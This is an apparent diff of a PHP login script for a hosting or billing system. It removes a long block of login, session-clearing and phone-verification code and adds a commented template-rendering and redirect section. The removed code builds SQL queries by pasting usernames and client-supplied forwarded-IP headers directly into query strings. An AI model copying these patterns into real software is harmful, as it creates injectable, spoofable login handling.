- $_SESSION['lastip'] = $remoteip;
- $lastip = $remoteip;
- }
- $llogin = strtotime("now");
- $query = "UPDATE users SET lastlogin='{$llogin}',lastip='{$remoteip}' WHERE username='{$newuid}'";
- $result = mysql_query1($query);
- $query = "INSERT INTO logins (username,date,type,ip,httpip) VALUES ('{$newuid}','{$llogin}','Login','{$remoteip}','{$remoteip2}')";
- $result = mysql_query1($query);
- $cart_life = strtotime("+5 days");
- setcookie("uip", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("urm", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uuser", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uauth", false, "{$cart_life}", "/", "{$cookie_domain}");
- $_SESSION['LoggedIn'] = false;
- $_SESSION['adminflag'] = false;
- $_SESSION['adminuser'] = false;
- $_SESSION['password2'] = false;
- $_SESSION['password1'] = false;
- $_SESSION['newuid'] = false;
- $_SESSION['admin'] = false;
- unset($_SESSION['newuid']);
- unset($_SESSION['LoggedIn']);
- unset($password1);
- unset($newuid);
- unset($admin);
- unset($LoggedIn);
- $cErrorMsg = FRAUDLOGIN;
- $cErrorMsg = generate_dmsg($cErrorMsg, "error");
- $fraud_login = 0;
- } else if ($numrows == 0) {
- $cart_life = strtotime("+5 days");
- setcookie("urm", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uuser", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uauth", false, "{$cart_life}", "/", "{$cookie_domain}");
- $_SESSION['LoggedIn'] = false;
- $_SESSION['adminflag'] = false;
- $_SESSION['adminuser'] = false;
- $_SESSION['password2'] = false;
- $_SESSION['password1'] = false;
- $_SESSION['newuid'] = false;
- $_SESSION['admin'] = false;
- unset($_SESSION['newuid']);
- unset($_SESSION['LoggedIn']);
- unset($password1);
- unset($newuid);
- unset($admin);
- unset($LoggedIn);
- $cErrorMsg = BADLOGIN1;
- $cErrorMsg = generate_dmsg($cErrorMsg, "warning");
- } else if ($numrows != 0 && $fetch_em['active'] == 3) {
- $remoteip = $_SERVER['REMOTE_ADDR'];
- $remoteip2 = $_SERVER['HTTP_CLIENT_IP'];
- if ($remoteip2 == "") {
- $remoteip2 = $_SERVER['HTTP_X_FORWARDED_FOR'];
- }
- if ($lastip == "") {
- $_SESSION['lastip'] = $remoteip;
- $lastip = $remoteip;
- }
- $llogin = strtotime("now");
- $query = "UPDATE users SET lastlogin='{$llogin}',lastip='{$remoteip}' WHERE username='{$newuid}'";
- $result = mysql_query1($query);
- $query = "INSERT INTO logins (username,date,type,ip,httpip) VALUES ('{$newuid}','{$llogin}','Login','{$remoteip}','{$remoteip2}')";
- $result = mysql_query1($query);
- $telesignactive = sqlsingle("select * from module_types where name='telesign'", "status");
- $vlactive = sqlsingle("select * from module_types where name='varilogix'", "status");
- $maxmindactive = sqlsingle("select * from module_types where name='maxmindvoice'", "status");
- $isphoneverified = sqlsingle("select * from users where username='{$newuid}'", "fraud_phone_cc_verified");
- $bypassphoneverify = sqlsingle("select * from users where username='{$newuid}'", "fraud_phone_bypass");
- $phonecount = sqlsingle("select * from users where username='{$newuid}'", "fraud_phone_count");
- if ($phonecountallowed <= $phonecount) {
- $nosecondchance = "1";
- }
- if (($maxmindactive == "1" || $vlactive == "1" || $telesignactive == "1") && $isphoneverified != "1" && $bypassphoneverify != "1" && !$nosecondchance) {
- include (WORKDIR . "/includes/language/{$drlang}/createacct.php");
- $userphone = sqlsingle("select * from users where username='{$newuid}'", "phone");
- $phone = mb_split("[.]", $userphone) [1];
- $countrycode = mb_split("[.]", $userphone) [0];
- $countrycode = str_replace("+", "", $countrycode);
- if ($maxmindactive == "1") {
- $SQL = "SELECT status,config1,config2,config3,config4,config5,config6,config7,config8,config10,config9,module_id FROM `module_types` WHERE name = 'maxmindvoice'";
- $query = mysql_query1($SQL);
- $ts_type = mysql_fetch_row($query) [11];
- $ts_where = mysql_fetch_row($query) [10];
- $ts_useid = mysql_fetch_row($query) [9];
- $ts_default = mysql_fetch_row($query) [8];
- $ts_redial = mysql_fetch_row($query) [7];
- $ts_delay = mysql_fetch_row($query) [6];
- $ts_authid = mysql_fetch_row($query) [5];
- $ts_custid = mysql_fetch_row($query) [4];
- $ts_pass = mysql_fetch_row($query) [3];
- $ts_user = mysql_fetch_row($query) [2];
- $ts_url = mysql_fetch_row($query) [1];
- $ts_status = mysql_fetch_row($query) [0];
- $flaggedtext = "";
- $ts_status = 1;
- if ($ts_status == 1 && $_SESSION['voiced'] != "1") {
- include (WORKDIR . "/includes/maxmind/pvfunctions.php");
- $uri = $ts_url;
- $iduri = $ts_idurl;
- $custID = $ts_pass;
- $randCode = rand(1000, 9999);
- $ts_randCode = $randCode;
- $countryCode = $countrycode;
- $phoneNum = "+" . $countryCode . $phone;
- if ($_POST['delay'] < $ts_delay || 5 < $_POST['delay'] || !is_numeric($_POST['delay'])) {
- $delayTime = $ts_delay;
- } else {
- $delayTime = $_POST['delay'];
- }
- $callinfo = mmvCALL($uri, $custID, $phoneNum, $randCode, $delayTime);
- $ucomment = "MMV Call Info-Reference ID: {$callinfo['refid']} Error Message: {$callinfo['err']}";
- if (trim($callinfo[refid]) != "") {
- $callinfo[1] = "0";
- $activatenow = "3";
- $account_hold = "1";
- } else {
- if ($ts_default == "3") {
- $activatenow = "3";
- $account_hold = "1";
- }
- }
- } else {
- if ($_SESSION['voiced'] == "1") {
- $activatenow = "3";
- $account_hold = "1";
- }
- }
- } else if ($telesignactive == "1") {
- $SQL = "SELECT status,config1,config2,config3,config4,config5,config6,config7,config8,config10,config9,module_id FROM `module_types` WHERE name = 'telesign'";
- $query = mysql_query1($SQL);
- $ts_type = mysql_fetch_row($query) [11];
- $ts_where = mysql_fetch_row($query) [10];
- $ts_useid = mysql_fetch_row($query) [9];
- $ts_default = mysql_fetch_row($query) [8];
- $ts_redial = mysql_fetch_row($query) [7];
- $ts_delay = mysql_fetch_row($query) [6];
- $ts_authid = mysql_fetch_row($query) [5];
- $ts_custid = mysql_fetch_row($query) [4];
- $ts_pass = mysql_fetch_row($query) [3];
- $ts_user = mysql_fetch_row($query) [2];
- $ts_url = mysql_fetch_row($query) [1];
- $ts_status = mysql_fetch_row($query) [0];
- $flaggedtext = "";
- $ts_status = 1;
- if ($ts_status == 1 && $_SESSION['voiced'] != "1") {
- include (WORKDIR . "/includes/telesign/pvfunctions.php");
- $uri = $ts_url;
- $iduri = $ts_idurl;
- $custID = $ts_custid;
- $authID = $ts_authid;
- $randCode = rand(10000, 99999);
- $redialCount = $ts_redial;
- $countryCode = $countrycode;
- $phoneNum = $phone;
- if ($_POST['delay'] < $ts_delay || 5 < $_POST['delay'] || !is_numeric($_POST['delay'])) {
- $delayTime = $ts_delay;
- } else {
- $delayTime = $_POST['delay'];
- }
- $extContent = "";
- $extType = "";
- $ts_randCode = $randCode;
- if ($ts_useid == "1") {
- $badtype = false;
- $callinfo = array();
- $ret = requestID($uri, $custID, $authID, $countryCode, $phoneNum);
- $xml_parser = xml_parser_create();
- xml_set_element_handler($xml_parser, "startElement", "endElement");
- xml_set_character_data_handler($xml_parser, "characterData");
- xml_parse($xml_parser, $ret);
- xml_parser_free($xml_parser);
- $ucomment = "TS ID Info-Type: {$callinfo['6']} City: {$callinfo['10']} State: {$callinfo['8']} Zip: {$callinfo['9']} Country: {$callinfo['7']} Reference ID: {$callinfo['3']} Error Code: {$callinfo['4']} Error Message: {$callinfo['5']}";
- if (!strstr($ts_where, $callinfo[11]) && trim($ts_where) != "" && $ts_where != NULL) {
- $badtype = "1";
- }
- }
- $callinfo = "";
- $callinfo = array();
- $ret = requestCALL($uri, $custID, $authID, $countryCode, $phoneNum, $randCode, $delayTime, $redialCount, $extContent, $extType);
- $xml_parser2 = xml_parser_create();
- xml_set_element_handler($xml_parser2, "startElement", "endElement");
- xml_set_character_data_handler($xml_parser2, "characterData");
- xml_parse($xml_parser2, $ret);
- xml_parser_free($xml_parser2);
- $ucomment2 = "TS Call Info-Reference ID: {$callinfo['0']} Error Code: {$callinfo['1']} Error Message: {$callinfo['2']}";
- if ($callinfo[1] == "0" || $ts_useid == "1" && $badtype == "1") {
- $activatenow = "3";
- $account_hold = "1";
- } else {
- if ($ts_default == "3") {
- $activatenow = "3";
- $account_hold = "1";
- }
- }
- } else {
- if ($_SESSION['voiced'] == "1") {
- $activatenow = "3";
- $account_hold = "1";
- }
- }
- } else if ($vlactive == "1") {
- $SQL = "SELECT status,config1,config2,config3,config4,config5,config6,config7,config8,config10,config9,module_id FROM `module_types` WHERE name = 'varilogix'";
- $query = mysql_query1($SQL);
- $ts_type = mysql_fetch_row($query) [11];
- $ts_where = mysql_fetch_row($query) [10];
- $ts_useid = mysql_fetch_row($query) [9];
- $ts_default = mysql_fetch_row($query) [8];
- $ts_redial = mysql_fetch_row($query) [7];
- $ts_productinfo = mysql_fetch_row($query) [6];
- $ts_apiuser = mysql_fetch_row($query) [5];
- $ts_profileid = mysql_fetch_row($query) [4];
- $ts_pass = mysql_fetch_row($query) [3];
- $ts_user = mysql_fetch_row($query) [2];
- $ts_url = mysql_fetch_row($query) [1];
- $VLresult = mysql_fetch_row($query) [0];
- if ($ts_status == 1 && $_SESSION['voiced'] != "1") {
- $query = "SELECT fname,lname,email FROM users WHERE username='{$newuid}'";
- $result = mysql_query1($query);
- $email = mysql_fetch_row(@$result) [2];
- $lname = mysql_fetch_row(@$result) [1];
- $fname = mysql_fetch_row(@$result) [0];
- $randCode = rand(1000, 9999);
- $ts_randCode = $randCode;
- require (WORKDIR . "/includes/varilogix/Request.php");
- require (WORKDIR . "/includes/varilogix/Call.php");
- require (WORKDIR . "/includes/varilogix/Call/Result.php");
- $call = new Varilogix_Call("drams-2b8baf", $ts_user, md5($ts_pass), intval($ts_profileid));
- $call->setProductInfo($ts_productinfo, "0.00");
- $call->setPin($randCode);
- $call->setCustomerInfo($fname . " " . $lname, $email, $phone, strtoupper($country));
- $result = $call->call();
- $status = $result;
- $callid = $call->getCode();
- $statusmsg = $call->getMessage();
- $flaggedtext = "";
- $ucomment2 = "Varilogix Call Info-Reference ID: {$callid} Status: {$status} Status Message: {$statusmsg}";
- if ($status == "1000" || $status == "calling") {
- $callinfo[1] = "0";
- $activatenow = "3";
- $account_hold = "1";
- } else {
- if ($ts_default == "3") {
- $activatenow = "3";
- $account_hold = "1";
- }
- }
- } else if ($_SESSION['voiced'] == "1") {
- $cErrorMsg = BADLOGIN2;
- $cErrorMsg = generate_dmsg($cErrorMsg, "warning");
- }
- }
- if (($ts_status == 1 || $VLresult == "1") && $_SESSION['voiced'] != "1") {
- $userid = sqlsingle("SELECT * FROM users WHERE username='" . $newuid . "'", "id");
- $date = strtotime("now");
- if ($uvcomment != "") {
- $query = "INSERT INTO client_comments (adminid,userid,comment,date) VALUES ('Signup','{$userid}','{$uvcomment}','{$date}')";
- $result = mysql_query1($query);
- }
- if ($ucomment != "") {
- $query = "INSERT INTO client_comments (adminid,userid,comment,date) VALUES ('Signup','{$userid}','{$ucomment}','{$date}')";
- $result = mysql_query1($query);
- }
- if ($ucomment2 != "") {
- $query = "INSERT INTO client_comments (adminid,userid,comment,date) VALUES ('Signup','{$userid}','{$ucomment2}','{$date}')";
- $result = mysql_query1($query);
- }
- }
- include (WORKDIR . "/pnewacctwelcome.php");
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- }
- $cart_life = strtotime("+5 days");
- setcookie("urm", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uuser", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uauth", false, "{$cart_life}", "/", "{$cookie_domain}");
- $_SESSION['LoggedIn'] = false;
- $_SESSION['adminflag'] = false;
- $_SESSION['adminuser'] = false;
- $_SESSION['password2'] = false;
- $_SESSION['password1'] = false;
- $_SESSION['newuid'] = false;
- $_SESSION['admin'] = false;
- unset($_SESSION['newuid']);
- unset($_SESSION['LoggedIn']);
- unset($password1);
- unset($newuid);
- unset($admin);
- unset($LoggedIn);
- $cErrorMsg = BADLOGIN2;
- $cErrorMsg = generate_dmsg($cErrorMsg, "warning");
- } else if ($numrows != 0 && $password1 != $fetch_em['password']) {
- $cart_life = strtotime("+5 days");
- setcookie("urm", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uuser", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uauth", false, "{$cart_life}", "/", "{$cookie_domain}");
- $_SESSION['LoggedIn'] = false;
- $_SESSION['adminflag'] = false;
- $_SESSION['adminuser'] = false;
- $_SESSION['password2'] = false;
- $_SESSION['password1'] = false;
- $_SESSION['newuid'] = false;
- $_SESSION['admin'] = false;
- unset($_SESSION['newuid']);
- unset($_SESSION['LoggedIn']);
- unset($password1);
- unset($newuid);
- unset($admin);
- unset($LoggedIn);
- $cErrorMsg = BADLOGIN3;
- $cErrorMsg = generate_dmsg($cErrorMsg, "warning");
- } else {
- $cart_life = strtotime("+5 days");
- setcookie("urm", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uuser", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uauth", false, "{$cart_life}", "/", "{$cookie_domain}");
- $_SESSION['LoggedIn'] = false;
- $_SESSION['adminflag'] = false;
- $_SESSION['adminuser'] = false;
- $_SESSION['password2'] = false;
- $_SESSION['password1'] = false;
- $_SESSION['newuid'] = false;
- $_SESSION['admin'] = false;
- unset($_SESSION['newuid']);
- unset($_SESSION['LoggedIn']);
- unset($password1);
- unset($newuid);
- unset($admin);
- unset($LoggedIn);
- $cErrorMsg = BADLOGIN;
- $cErrorMsg = generate_dmsg($cErrorMsg, "warning");
- }
- $cart_life = strtotime("+5 days");
- setcookie("urm", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uuser", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uauth", false, "{$cart_life}", "/", "{$cookie_domain}");
- $_SESSION['LoggedIn'] = false;
- $_SESSION['adminflag'] = false;
- $_SESSION['adminuser'] = false;
- $_SESSION['password2'] = false;
- $_SESSION['password1'] = false;
- $_SESSION['newuid'] = false;
- $_SESSION['admin'] = false;
- unset($_SESSION['newuid']);
- unset($_SESSION['LoggedIn']);
- unset($password1);
- unset($newuid);
- unset($admin);
- unset($LoggedIn);
- $LoggedIn = 0;
- }
- }
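// --- Final rendering -------------------------------------------------------
// Reached by every path above that did not already redirect. Loads the
// template engine, hands the page state to it, then either redirects an
// authenticated user or prints one of the login templates.
// Relies on variables set earlier in this file: $LoggedIn, $adminflag,
// $subaction, $excessive_login, $securebase and the values listed below.
include (WORKDIR . "/includes/gparser.php");

// Values exposed to the templates. NOTE(review): set_var() comes from
// gparser.php, which is not visible here, so whether it HTML-escapes values is
// unknown; request-derived values ($rtype, $subaction, $post_string, $cErrorMsg)
// must be escaped at the point of output in the template.
$templateVars = array(
    "cErrorMsg" => $cErrorMsg,
    "rtype" => $rtype,
    "id" => $id,
    "lastlogin" => $lastlogin,
    "lastip" => $lastip,
    "post_string" => $post_string,
    "subaction" => $subaction,
    "nameemail" => $nameemail,
    "namebundle" => $namebundle,
    "cTld" => $cTld,
    "cSld" => $cSld,
    "usecookies" => $usecookies,
    "excessive_login" => $excessive_login,
);
foreach ($templateVars as $varName => $varValue) {
    $template->set_var($varName, $varValue);
}

if ($LoggedIn == "1") {
    // An authenticated user never sees the login form. Admins (positive flag
    // or the special "-1" value, compared loosely as elsewhere in this file)
    // asking for a helpdesk ticket are sent straight to it; everyone else goes
    // to the welcome page.
    // The original `$_GET[id]` (bare word) relied on an undefined constant
    // being coerced to the string "id"; the key is quoted here and the value
    // is urlencode()d so a request-supplied id cannot smuggle extra query
    // parameters into the redirect target.
    $helpdeskId = isset($_GET['id']) ? $_GET['id'] : "";
    if ($helpdeskId && (0 < $adminflag || $adminflag == "-1") && $subaction == "adhd") {
        $location = "{$securebase}/admin/helpdesk.php?subaction=adhd&id=" . urlencode($helpdeskId);
    } else {
        $location = "{$securebase}/welcome.php";
    }
    ob_start();
    header("Location: {$location}");
    // Padding + flush so the redirect leaves immediately (same pattern as the
    // other redirects in this file).
    echo str_repeat(" ", 200) . "\n";
    flush();
    exit();
}

if ($excessive_login != "") {
    // $excessive_login is set earlier in this file (presumably a lockout /
    // rate-limit indicator); it selects the alternate login template.
    print $template->parse("aLogIn2.php");
} else if (!empty($_GET['pda']) || (isset($_SESSION['pda']) && $_SESSION['pda'] == "1")) {
    // Once requested, the PDA layout sticks to the session.
    $_SESSION['pda'] = "1";
    print $template->parse("aLogInpda.php");
} else {
    print $template->parse("aLogIn.php");
}

// Close any remaining output buffers without "@" suppression: flush the
// innermost active buffer, then discard the next one if there is one.
if (0 < ob_get_level()) {
    ob_end_flush();
}
if (0 < ob_get_level()) {
    ob_end_clean();
}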